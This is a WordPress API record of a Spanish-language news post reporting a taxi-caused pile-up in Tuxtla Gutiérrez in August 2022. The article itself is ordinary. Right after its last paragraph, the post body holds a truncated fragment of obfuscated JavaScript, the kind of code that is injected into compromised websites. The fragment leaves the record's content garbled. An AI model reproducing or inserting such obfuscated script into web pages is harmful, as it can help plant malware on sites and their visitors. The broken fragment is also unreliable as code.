{"id":4165,"date":"2022-08-05T03:31:31","date_gmt":"2022-08-05T03:31:31","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4165"},"modified":"2022-08-05T03:31:32","modified_gmt":"2022-08-05T03:31:32","slug":"unidad-de-transporte-publico-provoca-carambola-en-el-libramiento-norte-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4165","title":{"rendered":"Unidad de transporte p\u00fablico provoca carambola en el Libramiento Norte de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"577\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220804-WA0034-1024x577.jpg\" alt=\"\" class=\"wp-image-4166\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220804-WA0034-1024x577.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220804-WA0034-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220804-WA0034-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220804-WA0034-1536x865.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220804-WA0034.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 4 de agosto del 2022. Tuxtla Guti\u00e9rrez. &#8211; Una unidad de transporte p\u00fablico en la modalidad de taxi provoc\u00f3 una carambola en el Libramiento Norte y Calle Central.De acuerdo con los reportes de tr\u00e1nsito este hecho ocurri\u00f3 cerca de las 8:30 de la noche cuando el VW tipo Vento con n\u00famero econ\u00f3mico 1357 circulaba en el sentido de Poniente a Oriente a exceso de velocidad cuando el conductor perdi\u00f3 el control y choc\u00f3 contra un Chevrolet Aveo de color rojo que a su vez sali\u00f3 impactado y se estrell\u00f3 contra un Jetta de color rojo.En su loca carrera el taxi subi\u00f3 al camell\u00f3n central y termin\u00f3 impactando contra un \u00e1rbol quedando con graves da\u00f1os.Al lugar arribaron param\u00e9dicos de Protecci\u00f3n Civil Municipal para atender al  conductor del taxi.La unidad de transporte p\u00fablico fue remolcada a un corral\u00f3n en turno y los dos particulares llegaron a un acuerdo armonioso mediante una aseguradora.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 4 de agosto del 2022. Tuxtla Guti\u00e9rrez. &#8211; Una unidad de transporte p\u00fablico en la modalidad de taxi provoc\u00f3 una carambola en el Libramiento Norte y Calle Central.De acuerdo con los reportes de tr\u00e1nsito este hecho ocurri\u00f3 cerca de las 8:30 de la noche cuando el VW tipo Vento con n\u00famero econ\u00f3mico &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4166,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-4165","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4165","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4165"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4165\/revisions"}],"predecessor-version":[{"id":4167,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4165\/revisions\/4167"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4166"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4165"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4165"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4165"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}